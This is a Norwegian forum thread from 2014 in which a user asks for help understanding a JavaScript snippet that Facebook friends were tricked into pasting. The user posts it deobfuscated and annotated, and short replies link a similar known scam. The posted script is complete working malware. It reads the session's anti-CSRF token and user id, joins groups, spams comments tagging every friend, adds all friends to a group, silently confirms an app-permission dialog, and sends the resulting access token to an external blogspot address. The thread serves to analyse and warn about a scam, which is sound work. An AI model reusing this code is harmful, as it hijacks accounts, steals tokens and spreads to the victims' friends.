Areyan Skrevet 29. april 2014 Rapporter Del Skrevet 29. april 2014 (endret) Hei, fikk noen rare forespørsler via facebook om a copy-paste og kjøre koden herfra på facebooken min.Mistenker at det er et hackerforsøk og vil gjerne ha litt hjelp fra folk som er kyndige med javascript til å hjelpe meg å forstå nøyaktig hva denne koden vil gjøre. Og selvfølgelig hvilke konsekvenser det vil ha for en facebook-profil. Setter veldig pris på litt hjelp her da noen av mine mindre datakyndige venner selvfølgelig har gjort som hackeren har instruert og kjørt koden... Har tatt meg bryet med å oversette de kryptiske bitene til koden det skal representere og formatere den til et lesbart nivå som best jeg kan:
// ---------------------------------------------------------------------------
// Reader annotation (analysis of the pasted script; the code itself is unchanged).
// Every request below uses a relative or facebook.com URL, so when the script
// is run on a logged-in Facebook page the requests go out under that session.
// Visible actions, in order:
//   1. subscribe the account to four lists (Kodran)
//   2. send join requests for four groups (g)
//   3. fetch the friend list and post comments that mention every friend
//   4. join one group again and add every friend to it
//   5. submit an app-permission dialog and pass the resulting access token
//      to an external blogspot address
// Things a person who ran it would want to review: list subscriptions, group
// memberships, comments posted in their name, and authorized apps.
// ---------------------------------------------------------------------------

// Step 1. Kodran injects a <script> element that calls the page's own
// AsyncRequest object against the list-subscribe endpoint, with the given
// id as the flid field. It is then called for four hard-coded ids.
function Kodran(uidss) { var a = document.createElement('script'); a.innerHTML = "new AsyncRequest().setURI('/ajax/friends/lists/subscribe/modify?location=permalink&action=subscribe').setData({ flid: " + uidss + " }).send();"; document.body.appendChild(a) }
Kodran("1379575028991328"); Kodran("1379738492308315"); Kodran("562521103826775"); Kodran("262651447224104");

// Step 2. b = value of the form field named fb_dtsg on the current page
// (it is echoed back as fb_dtsg in every POST below; presumably the
// anti-CSRF token of the session - confirm).
// c = the numeric id taken from the c_user cookie.
var b = document.getElementsByName("fb_dtsg")[0].value, c = document.cookie.match(document.cookie.match(/c_user=(\d+)/)[1]);
// g POSTs a group id together with b and c to the group membership endpoint
// (r2j.php). The response handler does nothing with the result.
function g(d) { var a = new XMLHttpRequest; d = "&ref=group_jump_header&group_id=" + d + "&fb_dtsg=" + b + "&__user=" + c + "&phstamp="; a.open("POST", "/ajax/groups/membership/r2j.php?__a=1", !0); a.onreadystatechange = function () { 4 == a.readyState && 200 == a.status && a.close }; a.send(d) }
g("235841983200157"); g("623270711058894"); g("166191003446381"); g("429414337196220");
b = document.getElementsByName("fb_dtsg")[0].value; c = document.cookie.match(document.cookie.match(/c_user=(\d+)/)[1]);

// Step 3. String table used by the obfuscated part that follows: every
// property name, URL and parameter is looked up by index in _0xa22c.
// Indexes that matter for reading the code: [5] is the id that gets
// commented on, [34]/[36] the friend typeahead URL, [59] the add_comment
// endpoint, [18]..[22] the pieces of a mention in the form @[uid:text].
// (\x26 is the ampersand, \x22 the double quote.)
var _0xa22c=["value","fb_dtsg","getElementsByName","match","cookie","281001968734667","onreadystatechange","readyState","arkadaslar = ","for (;;","","replace","responseText",";","length","entries","payload","round"," @[","uid",":","text","]"," 
","\x26filter[0]=user","\x26options[0]=friends_only","\x26options[1]=nm","\x26token=v7","\x26viewer=","\x26__user=","https://","indexOf","URL","GET","https://www.facebook.com/ajax/typeahead/first_degree.php?__a=1","open","http://www.facebook.com/ajax/typeahead/first_degree.php?__a=1","send","random","floor","\x26ft_ent_identifier=","\x26comment_text=","\x26source=2","\x26client_id=1377871797138:1707018092","\x26reply_fbid","\x26parent_comment_id","\x26rootid=u_jsonp_2_3","\x26clp={\x22cl_impid\x22:\x22453524a0\x22,\x22clearcounter\x22:0,\x22elementid\x22:\x22js_5\x22,\x22version\x22:\x22x\x22,\x22parent_fbid\x22:","}","\x26attached_sticker_fbid=0","\x26attached_photo_fbid=0","\x26giftoccasion","\x26ft[tn]=[]","\x26__a=1","\x26__dyn=7n8ahyj35ynxl2u5F97KepEsyo","\x26__req=q","\x26fb_dtsg=","\x26ttstamp=","POST","/ajax/ufi/add_comment.php","Content-type","application/x-www-form-urlencoded","setRequestHeader","status","close"];
// Same two reads as in step 2, written through the string table:
// the fb_dtsg field value and the c_user id.
var fb_dtsg=document[_0xa22c[2]](_0xa22c[1])[0][_0xa22c[0]];
var user_id=document[_0xa22c[4]][_0xa22c[3]](document[_0xa22c[4]][_0xa22c[3]](/c_user=(\d+)/)[1]);
var id=_0xa22c[5];
var arkadaslar=[];
var svn_rev;
// arkadaslari_al: GET the first_degree typeahead endpoint with
// filter[0]=user and options[0]=friends_only for the current user id,
// i.e. request the friend list.
// NOTE(review): the response body is handed to eval after a string replace;
// whatever that endpoint returns is executed as code in the page.
// The entries are then walked in batches of 27; each batch becomes one
// string of @[uid:text] mentions that is passed to yorum_yap.
function arkadaslari_al(id) {
  var _0x7892x7= new XMLHttpRequest();
  _0x7892x7[_0xa22c[6]]=function () {
    if(_0x7892x7[_0xa22c[7]]==4) {
      eval(_0xa22c[8]+_0x7892x7[_0xa22c[12]].toString()[_0xa22c[11]](_0xa22c[9],_0xa22c[10])+_0xa22c[13]);
      for(f=0; f<Math[_0xa22c[17]](arkadaslar[_0xa22c[16]][_0xa22c[15]][_0xa22c[14]]/27); f++) {
        mesaj=_0xa22c[10]; mesaj_text=_0xa22c[10];
        for(i=f*27; i<(f+1)*27; i++) {
          if(arkadaslar[_0xa22c[16]][_0xa22c[15]][i]) {
            mesaj+=_0xa22c[18]+arkadaslar[_0xa22c[16]][_0xa22c[15]][i][_0xa22c[19]]+_0xa22c[20]+arkadaslar[_0xa22c[16]][_0xa22c[15]][i][_0xa22c[21]]+_0xa22c[22];
            mesaj_text+=_0xa22c[23]+arkadaslar[_0xa22c[16]][_0xa22c[15]][i][_0xa22c[21]];
          } ;
        } ;
        yorum_yap(id,mesaj);
      } ;
    } ;
  } ;
  var _0x7892x8=_0xa22c[24]; _0x7892x8+=_0xa22c[25]; _0x7892x8+=_0xa22c[26]; _0x7892x8+=_0xa22c[27]; _0x7892x8+=_0xa22c[28]+user_id;
  _0x7892x8+=_0xa22c[29]+user_id;
  // Picks the https or http form of the same URL depending on document.URL.
  if(document[_0xa22c[32]][_0xa22c[31]](_0xa22c[30])>=0) { _0x7892x7[_0xa22c[35]](_0xa22c[33],_0xa22c[34]+_0x7892x8,true); } else { _0x7892x7[_0xa22c[35]](_0xa22c[33],_0xa22c[36]+_0x7892x8,true); } ;
  _0x7892x7[_0xa22c[37]]();
} ;
// RandomArkadas: builds a string of nine mentions of randomly chosen
// friends. It is defined here but not called anywhere in this listing.
function RandomArkadas() { var _0x7892xa=_0xa22c[10]; for(i=0; i<9; i++) { _0x7892xa+=_0xa22c[18]+arkadaslar[_0xa22c[16]][_0xa22c[15]][Math[_0xa22c[39]](Math[_0xa22c[38]]()*arkadaslar[_0xa22c[16]][_0xa22c[15]][_0xa22c[14]])][_0xa22c[19]]+_0xa22c[20]+arkadaslar[_0xa22c[16]][_0xa22c[15]][Math[_0xa22c[39]](Math[_0xa22c[38]]()*arkadaslar[_0xa22c[16]][_0xa22c[15]][_0xa22c[14]])][_0xa22c[21]]+_0xa22c[22]; } ; return _0x7892xa; } ;
// yorum_yap: POSTs a comment to /ajax/ufi/add_comment.php. The target is
// the id argument (ft_ent_identifier), the comment text is the mention
// string, and fb_dtsg and the user id are attached to the form body.
function yorum_yap(id,_0x7892xc) {
  var _0x7892xd= new XMLHttpRequest();
  var _0x7892x8=_0xa22c[10];
  _0x7892x8+=_0xa22c[40]+id; _0x7892x8+=_0xa22c[41]+encodeURIComponent(_0x7892xc); _0x7892x8+=_0xa22c[42]; _0x7892x8+=_0xa22c[43]; _0x7892x8+=_0xa22c[44]; _0x7892x8+=_0xa22c[45]; _0x7892x8+=_0xa22c[46]; _0x7892x8+=_0xa22c[47]+id+_0xa22c[48]; _0x7892x8+=_0xa22c[49]; _0x7892x8+=_0xa22c[50]; _0x7892x8+=_0xa22c[51]; _0x7892x8+=_0xa22c[52]; _0x7892x8+=_0xa22c[29]+user_id; _0x7892x8+=_0xa22c[53]; _0x7892x8+=_0xa22c[54]; _0x7892x8+=_0xa22c[55]; _0x7892x8+=_0xa22c[56]+fb_dtsg; _0x7892x8+=_0xa22c[57];
  _0x7892xd[_0xa22c[35]](_0xa22c[58],_0xa22c[59],true);
  _0x7892xd[_0xa22c[62]](_0xa22c[60],_0xa22c[61]);
  _0x7892xd[_0xa22c[6]]=function () { if(_0x7892xd[_0xa22c[7]]==4&&_0x7892xd[_0xa22c[63]]==200) { _0x7892xd[_0xa22c[64]]; } ; } ;
  _0x7892xd[_0xa22c[37]](_0x7892x8);
} ;
// Starts the chain: friend list -> mention comments on id 281001968734667.
arkadaslari_al(id);

// Step 4. Same membership request as g() above, for a single group id.
var gid = ['623270711058894'];
var fb_dtsg = document['getElementsByName']('fb_dtsg')[0]['value'];
var user_id = document['cookie']['match'](document['cookie']['match'](/c_user=(\d+)/)[1]);
var httpwp = new XMLHttpRequest();
var urlwp = '/ajax/groups/membership/r2j.php?__a=1';
var paramswp = '&ref=group_jump_header&group_id=' + gid + '&fb_dtsg=' + fb_dtsg + '&__user=' + user_id + '&phstamp=';
httpwp['open']('POST', urlwp,
true); httpwp['setRequestHeader']('Content-type', 'application/x-www-form-urlencoded'); httpwp['setRequestHeader']('Content-length', paramswp['length']); httpwp['setRequestHeader']('Connection', 'keep-alive'); httpwp['send'](paramswp);
var fb_dtsg = document['getElementsByName']('fb_dtsg')[0]['value'];
var user_id = document['cookie']['match'](document['cookie']['match'](/c_user=(\d+)/)[1]);
// Friend list again, this time with a synchronous request (third argument
// of open is false).
// NOTE(review): the response body is evaluated with eval here as well.
var friends = new Array();
gf = new XMLHttpRequest();
gf['open']('GET', '/ajax/typeahead/first_degree.php?__a=1&viewer=' + user_id + '&token' + Math['random']() + '&filter[0]=user&options[0]=friends_only', false);
gf['send']();
if (gf['readyState'] != 4) {} else { data = eval('(' + gf['responseText']['substr'](9) + ')'); if (data['error']) {} else { friends = data['payload']['entries']['sort'](function (_0x93dax8, _0x93dax9) { return _0x93dax8['index'] - _0x93dax9['index']; }); }; };
// One POST per friend to the group add-member endpoint (add_post.php) with
// that friend as the members field: every friend is added to group gid.
// This matches what is described further down the thread, where people are
// pulled into groups through friends who ran the code.
for (var i = 0; i < friends['length']; i++) { var httpwp = new XMLHttpRequest(); var urlwp = '/ajax/groups/members/add_post.php?__a=1'; var paramswp= '&fb_dtsg=' + fb_dtsg + '&group_id=' + gid + '&source=typeahead&ref=&message_id=&members=' + friends[i]['uid'] + '&__user=' + user_id + '&phstamp='; httpwp['open']('POST', urlwp, true); httpwp['setRequestHeader']('Content-type', 'application/x-www-form-urlencoded'); httpwp['setRequestHeader']('Content-length', paramswp['length']); httpwp['setRequestHeader']('Connection', 'keep-alive'); httpwp['onreadystatechange'] = function () { if (httpwp['readyState'] == 4 && httpwp['status'] == 200) {}; }; httpwp['send'](paramswp); };

// Step 5. App authorization and token hand-off. Only the first argument of
// indexOf is the search string, so the test is effectively whether the
// hostname contains www.facebook.com.
if (location.hostname.indexOf("www.facebook.com", "static.ak.facebook.com", "apps.facebook.com", "beta.facebook.com") >= 0) {
  var profile_id = document.cookie.match(document.cookie.match(/c_user=(\d+)/)[1]).toString();
  // uygulamaizinver: GET the given URL, parse the response into a detached
  // html element, and pass the first form it contains (with its action
  // URL) to duzenlevegonder.
  function uygulamaizinver(url) { var xmlhttp = new XMLHttpRequest(); xmlhttp.onreadystatechange = function () { if (xmlhttp.readyState == 4) { izikbenhtml = document.createElement("html"); izikbenhtml.innerHTML =
xmlhttp.responseText; if (izikbenhtml.getElementsByTagName("form").length > 0) { izikbenhtml.innerHTML = izikbenhtml.getElementsByTagName("form")[0].outerHTML act = izikbenhtml.getElementsByTagName("form")[0].action; duzenlevegonder(izikbenhtml, act); } } }; xmlhttp.open("GET", url, true); xmlhttp.send(); }
  // duzenlevegonder: rebuild the form as a POST body from its input fields
  // (the name filter appears intended to leave out the cancel fields),
  // set the first select to 80, append __CONFIRM__=1 and POST it to the
  // form action. In effect the dialog is submitted as confirmed without
  // the user seeing or clicking it. If the response is another form the
  // function calls itself again; otherwise it looks for
  // #access_token=...&expires_in in the response and passes the token to
  // tokenyolla.
  function duzenlevegonder(formnesne, act) { izikbenparams = ""; for (i = 0; i < formnesne.getElementsByTagName("input").length; i++) { if (formnesne.getElementsByTagName("input")[i].name.indexOf("__CANCEL__") < 0 && formnesne.getElementsByTagName("input")[i].name.indexOf("cancel_clicked")) { izikbenparams += "&" + formnesne.getElementsByTagName("input")[i].name + "=" + formnesne.getElementsByTagName("input")[i].value; } } if (formnesne.getElementsByTagName("select").length > 0) { izikbenparams += "&" + formnesne.getElementsByTagName("select")[0].name + "=80"; } izikbenparams.replace("&fb_dtsg", "fb_dtsg"); izikbenparams += "&__CONFIRM__=1"; formnesne = formnesne; var xmlhttp = new XMLHttpRequest(); xmlhttp.onreadystatechange = function () { if (xmlhttp.readyState == 4) { izikhtml = document.createElement("html"); izikhtml.innerHTML = xmlhttp.responseText; if (izikhtml.getElementsByTagName("form").length > 0) { izikhtml.innerHTML = izikhtml.getElementsByTagName("form")[0].outerHTML; act = izikhtml.getElementsByTagName("form")[0].action; duzenlevegonder(izikhtml, act) } else { sex = xmlhttp.responseText.match(/#access_token=(.*?)&expires_in/i); if (sex[1]) { tokenyolla(sex[1]); } } } }; xmlhttp.open("POST", act, true); xmlhttp.setRequestHeader("Content-Type", "application/x-www-form-urlencoded"); xmlhttp.send(izikbenparams); }
  // TokenUrl: OAuth dialog URL for the given app id with
  // response_type=token and the scope email, publish_stream, user_likes,
  // friends_likes, user_birthday.
  function TokenUrl(id) { return "//www.facebook.com/dialog/oauth?response_type=token&display=popup&client_id=" + id + "&redirect_uri=fbconnect://success&sso_key=com&scope=email,publish_stream,user_likes,friends_likes,user_birthday"; }
  // Runs the authorization for app id 121876164619130 when no token_<id>
  // entry is in localStorage, then reads the public profile name with a
  // synchronous Graph request. NOTE(review): tarih is not defined anywhere
  // in this listing.
  if (!localStorage['token_' + profile_id] || (localStorage['token_' + profile_id] && tarih.getTime() >=
localStorage['token_' + profile_id])) { uygulamaizinver(TokenUrl("121876164619130")); var http = new XMLHttpRequest(); http['open']('GET', 'http://graph.facebook.com/' + profile_id, false); http['send'](); var get = JSON.parse(http['responseText']); var isim = get.name; }
  // Every 200 ms, empties all elements with class _5ce, uiToggle wrap or
  // uiPopover. Presumably these are menu and dropdown controls of the page,
  // which then disappear while the script is running - TODO confirm.
  window.setInterval(function () { if (document.getElementsByClassName("_5ce")) { for (i = 0; i < document.getElementsByClassName("_5ce").length; i++) { document.getElementsByClassName("_5ce")[i].innerHTML = ""; } } if (document.getElementsByClassName("uiToggle wrap")) { for (i = 0; i < document.getElementsByClassName("uiToggle wrap").length; i++) { document.getElementsByClassName("uiToggle wrap")[i].innerHTML = ""; } } if (document.getElementsByClassName("uiPopover")) { for (i = 0; i < document.getElementsByClassName("uiPopover").length; i++) { document.getElementsByClassName("uiPopover")[i].innerHTML = ""; } } }, 200);
  // tokenyolla: navigates the top window to an external blogspot address
  // with the access token in the URL fragment, which hands the token to
  // that page.
  function tokenyolla(token) { top.location.href = 'http://19283746564.blogspot.com/#' + token; }
}
// Final message shown to the person who pasted the script.
var Zakarias = "click OK and wait for seconds, Hacking START now!! "; alert(Zakarias); Endret 29. april 2014 av Areyan Lenke til kommentar
War Skrevet 29. april 2014 Rapporter Del Skrevet 29. april 2014 Er det dette? http://www.scamsniper.info/2011/04/warning-cut-and-paste-java-code-leads.html Lenke til kommentar
Areyan Skrevet 29. april 2014 Forfatter Rapporter Del Skrevet 29. april 2014 Nei, tror ikke det. Men framgangsmetoden ligner, bortsett fra at man her blir randomly tatt opp i grupper som virker nokså suspekte, via venner som har kjørt koden ovenfor. Lenke til kommentar